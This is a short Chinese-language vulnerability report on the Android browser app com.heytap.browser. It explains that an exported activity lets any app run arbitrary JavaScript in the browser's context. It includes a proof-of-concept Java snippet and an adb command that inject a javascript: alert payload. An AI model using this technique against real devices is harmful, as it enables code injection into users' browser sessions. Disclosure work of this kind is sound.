在 Android 平台的 com.heytap.browser 应用中发现了一个漏洞。该漏洞允许攻击者在无需任何权限的情况下,在应用上下文中执行任意 JavaScript 代码。
com.heytap.browsercom.heytap.browser 应用中的 com.android.browser.RealBrowserActivity activity 被导出,任何第三方应用都可以在无需任何权限的情况下调用它。恶意应用可以利用这一点,在 com.heytap.browser 应用上下文中执行任意 JavaScript 代码。
{
super.onCreate(savedInstanceState);
String javaScriptCommand = "javascript:alert%28%27Test%20Alert%27%29%3B";
Intent intent = new Intent(Intent.ACTION_VIEW);
intent.setData(Uri.parse(javaScriptCommand));
intent.setClassName("com.heytap.browser", "com.android.browser.RealBrowserActivity");
startActivity(intent);
finish();
}
adb shell am start -a android.intent.action.VIEW -d "javascript:alert%28%27Test%20Alert%27%29%3B" -n com.heytap.browser/com.android.browser.RealBrowserActivity

成功利用此漏洞后,攻击者可以:
com.heytap.browser 应用上下文中执行任意 JavaScript 代码。